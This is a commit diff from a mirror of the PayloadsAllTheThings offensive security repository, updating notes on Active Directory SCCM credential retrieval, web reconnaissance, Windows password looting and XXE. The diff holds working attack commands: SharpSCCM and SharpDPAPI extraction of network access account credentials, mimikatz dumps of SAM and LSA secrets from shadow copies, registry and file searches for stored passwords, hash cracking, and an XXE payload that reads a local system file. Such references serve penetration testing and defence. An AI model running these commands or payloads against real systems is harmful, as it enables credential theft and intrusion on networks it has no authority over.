mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-05-04 23:26:05 +02:00
XXS Public Example + PHP Filter RCE
This commit is contained in:
parent
35ff178624
commit
fe41254fde
File diff suppressed because one or more lines are too long
|
@ -3663,9 +3663,10 @@ python Exchange2domain.py -ah attackterip -u user -p password -d domain.com -th
|
||||||
NetworkAccessPassword : <![CDATA[E600000001...8C6B5]]>
|
NetworkAccessPassword : <![CDATA[E600000001...8C6B5]]>
|
||||||
NetworkAccessUsername : <![CDATA[E600000001...00F92]]>
|
NetworkAccessUsername : <![CDATA[E600000001...00F92]]>
|
||||||
```
|
```
|
||||||
* Using [SharpDPAPI](https://github.com/GhostPack/SharpDPAPI/blob/81e1fcdd44e04cf84ca0085cf5db2be4f7421903/SharpDPAPI/Commands/SCCM.cs#L208-L244) for SCCM retrieval and decryption
|
* Using [GhostPack/SharpDPAPI](https://github.com/GhostPack/SharpDPAPI/blob/81e1fcdd44e04cf84ca0085cf5db2be4f7421903/SharpDPAPI/Commands/SCCM.cs#L208-L244) or [Mayyhem/SharpSCCM](https://github.com/Mayyhem/SharpSCCM) for SCCM retrieval and decryption
|
||||||
```ps1
|
```ps1
|
||||||
.\SharpDPAPI.exe SCCM
|
.\SharpDPAPI.exe SCCM
|
||||||
|
.\SharpSCCM.exe get naa -u USERNAME -p PASSWORD
|
||||||
```
|
```
|
||||||
* Check ACL for the CIM repository located at `C:\Windows\System32\wbem\Repository\OBJECTS.DATA`:
|
* Check ACL for the CIM repository located at `C:\Windows\System32\wbem\Repository\OBJECTS.DATA`:
|
||||||
```ps1
|
```ps1
|
||||||
|
@ -4048,4 +4049,6 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae
|
||||||
* [Diamond tickets - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/forged-tickets/diamond)
|
* [Diamond tickets - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/forged-tickets/diamond)
|
||||||
* [A Diamond (Ticket) in the Ruff - By CHARLIE CLARK July 05, 2022](https://www.semperis.com/blog/a-diamond-ticket-in-the-ruff/)
|
* [A Diamond (Ticket) in the Ruff - By CHARLIE CLARK July 05, 2022](https://www.semperis.com/blog/a-diamond-ticket-in-the-ruff/)
|
||||||
* [Sapphire tickets - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/forged-tickets/sapphire)
|
* [Sapphire tickets - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/forged-tickets/sapphire)
|
||||||
* [Exploiting RBCD Using a Normal User Account - tiraniddo.dev - Friday, 13 May 2022](https://www.tiraniddo.dev/2022/05/exploiting-rbcd-using-normal-user.html)
|
* [Exploiting RBCD Using a Normal User Account - tiraniddo.dev - Friday, 13 May 2022](https://www.tiraniddo.dev/2022/05/exploiting-rbcd-using-normal-user.html)
|
||||||
|
* [Exploring SCCM by Unobfuscating Network Access Accounts - @_xpn_ - Posted on 2022-07-09](https://blog.xpnsec.com/unobfuscating-network-access-accounts/)
|
||||||
|
* [.NET Advanced Code Auditing XmlSerializer Deserialization Vulnerability - April 2, 2019 by znlive](https://znlive.com/xmlserializer-deserialization-vulnerability)
|
|
@ -41,6 +41,8 @@
|
||||||
gitrob analyze johndoe --site=https://github.acme.com --endpoint=https://github.acme.com/api/v3 --access-tokens=token1,token2
|
gitrob analyze johndoe --site=https://github.acme.com --endpoint=https://github.acme.com/api/v3 --access-tokens=token1,token2
|
||||||
```
|
```
|
||||||
|
|
||||||
|
* Perform Google Dorks search
|
||||||
|
|
||||||
|
|
||||||
## Active recon
|
## Active recon
|
||||||
|
|
||||||
|
@ -74,7 +76,7 @@
|
||||||
|
|
||||||
### Web discovery
|
### Web discovery
|
||||||
|
|
||||||
* Locate `robots.txt` file
|
* Locate `robots.txt`, `security.txt`, `sitemap.xml` files
|
||||||
* Retrieve comments in source code
|
* Retrieve comments in source code
|
||||||
* Discover URL: [tomnomnom/waybackurls](github.com/tomnomnom/waybackurls)
|
* Discover URL: [tomnomnom/waybackurls](github.com/tomnomnom/waybackurls)
|
||||||
* Search for `hidden` parameters: [PortSwigger/param-miner](https://github.com/PortSwigger/param-miner)
|
* Search for `hidden` parameters: [PortSwigger/param-miner](https://github.com/PortSwigger/param-miner)
|
||||||
|
@ -109,7 +111,10 @@
|
||||||
|
|
||||||
## Looking for Web vulnerabilities
|
## Looking for Web vulnerabilities
|
||||||
|
|
||||||
* Explore the website and look for vulnerabilities listed in this repository: SQL injection, XSS, CRLF, ....
|
* Explore the website and look for vulnerabilities listed in this repository: SQL injection, XSS, CRLF, Cookies, ....
|
||||||
|
* Test for Business Logic weaknesses
|
||||||
|
* High or negative numerical values
|
||||||
|
* Try all the features and click all the buttons
|
||||||
* [The Web Application Hacker's Handbook Checklist](https://gist.github.com/gbedoya/10935137) copied from http://mdsec.net/wahh/tasks.html
|
* [The Web Application Hacker's Handbook Checklist](https://gist.github.com/gbedoya/10935137) copied from http://mdsec.net/wahh/tasks.html
|
||||||
|
|
||||||
* Subscribe to the site and pay for the additional functionality to test
|
* Subscribe to the site and pay for the additional functionality to test
|
||||||
|
|
|
@ -14,8 +14,8 @@
|
||||||
* [Default Writeable Folders](#default-writeable-folders)
|
* [Default Writeable Folders](#default-writeable-folders)
|
||||||
* [EoP - Looting for passwords](#eop---looting-for-passwords)
|
* [EoP - Looting for passwords](#eop---looting-for-passwords)
|
||||||
* [SAM and SYSTEM files](#sam-and-system-files)
|
* [SAM and SYSTEM files](#sam-and-system-files)
|
||||||
* [LAPS Settings](#laps-settings)
|
|
||||||
* [HiveNightmare](#hivenightmare)
|
* [HiveNightmare](#hivenightmare)
|
||||||
|
* [LAPS Settings](#laps-settings)
|
||||||
* [Search for file contents](#search-for-file-contents)
|
* [Search for file contents](#search-for-file-contents)
|
||||||
* [Search for a file with a certain filename](#search-for-a-file-with-a-certain-filename)
|
* [Search for a file with a certain filename](#search-for-a-file-with-a-certain-filename)
|
||||||
* [Search the registry for key names and passwords](#search-the-registry-for-key-names-and-passwords)
|
* [Search the registry for key names and passwords](#search-the-registry-for-key-names-and-passwords)
|
||||||
|
@ -405,15 +405,6 @@ samdump2 SYSTEM SAM -o sam.txt
|
||||||
|
|
||||||
Either crack it with `john -format=NT /root/sam.txt`, [hashcat](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Hash%20Cracking.md#hashcat) or use Pass-The-Hash.
|
Either crack it with `john -format=NT /root/sam.txt`, [hashcat](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Hash%20Cracking.md#hashcat) or use Pass-The-Hash.
|
||||||
|
|
||||||
### LAPS Settings
|
|
||||||
|
|
||||||
Extract `HKLM\Software\Policies\Microsoft Services\AdmPwd` from Windows Registry.
|
|
||||||
|
|
||||||
* LAPS Enabled: AdmPwdEnabled
|
|
||||||
* LAPS Admin Account Name: AdminAccountName
|
|
||||||
* LAPS Password Complexity: PasswordComplexity
|
|
||||||
* LAPS Password Length: PasswordLength
|
|
||||||
* LAPS Expiration Protection Enabled: PwdExpirationProtectionEnabled
|
|
||||||
|
|
||||||
### HiveNightmare
|
### HiveNightmare
|
||||||
|
|
||||||
|
@ -443,6 +434,16 @@ mimikatz> lsadump::sam /system:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\W
|
||||||
mimikatz> lsadump::secrets /system:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM /security:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SECURITY
|
mimikatz> lsadump::secrets /system:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM /security:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SECURITY
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### LAPS Settings
|
||||||
|
|
||||||
|
Extract `HKLM\Software\Policies\Microsoft Services\AdmPwd` from Windows Registry.
|
||||||
|
|
||||||
|
* LAPS Enabled: AdmPwdEnabled
|
||||||
|
* LAPS Admin Account Name: AdminAccountName
|
||||||
|
* LAPS Password Complexity: PasswordComplexity
|
||||||
|
* LAPS Password Length: PasswordLength
|
||||||
|
* LAPS Expiration Protection Enabled: PwdExpirationProtectionEnabled
|
||||||
|
|
||||||
|
|
||||||
### Search for file contents
|
### Search for file contents
|
||||||
|
|
||||||
|
@ -452,6 +453,10 @@ findstr /si password *.xml *.ini *.txt *.config
|
||||||
findstr /spin "password" *.*
|
findstr /spin "password" *.*
|
||||||
```
|
```
|
||||||
|
|
||||||
|
Also search in remote places such as SMB Shares and SharePoint.
|
||||||
|
* Search passwords in SharePoint: [nheiniger/SnaffPoint](https://github.com/nheiniger/SnaffPoint)
|
||||||
|
* Search passwords in SMB Shares: [SnaffCon/Snaffler](https://github.com/SnaffCon/Snaffler)
|
||||||
|
|
||||||
### Search for a file with a certain filename
|
### Search for a file with a certain filename
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
|
@ -477,12 +482,6 @@ reg query HKLM /f password /t REG_SZ /s
|
||||||
reg query HKCU /f password /t REG_SZ /s
|
reg query HKCU /f password /t REG_SZ /s
|
||||||
```
|
```
|
||||||
|
|
||||||
### Read a value of a certain sub key
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
REG QUERY "HKLM\Software\Microsoft\FTH" /V RuleList
|
|
||||||
```
|
|
||||||
|
|
||||||
### Passwords in unattend.xml
|
### Passwords in unattend.xml
|
||||||
|
|
||||||
Location of the unattend.xml files.
|
Location of the unattend.xml files.
|
||||||
|
|
|
@ -139,11 +139,9 @@ We try to display the content of the file `/etc/passwd`
|
||||||
|
|
||||||
:warning: `SYSTEM` and `PUBLIC` are almost synonym.
|
:warning: `SYSTEM` and `PUBLIC` are almost synonym.
|
||||||
|
|
||||||
```xml
|
```ps1
|
||||||
<?xml version="1.0" encoding="ISO-8859-1"?>
|
<!ENTITY % xxe PUBLIC "Random Text" "URL">
|
||||||
<!DOCTYPE foo [
|
<!ENTITY xxe PUBLIC "Any TEXT" "URL">
|
||||||
<!ELEMENT foo ANY >
|
|
||||||
<!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]><foo>&xxe;</foo>
|
|
||||||
```
|
```
|
||||||
|
|
||||||
### Classic XXE Base64 encoded
|
### Classic XXE Base64 encoded
|
||||||
|
|
Loading…
Reference in New Issue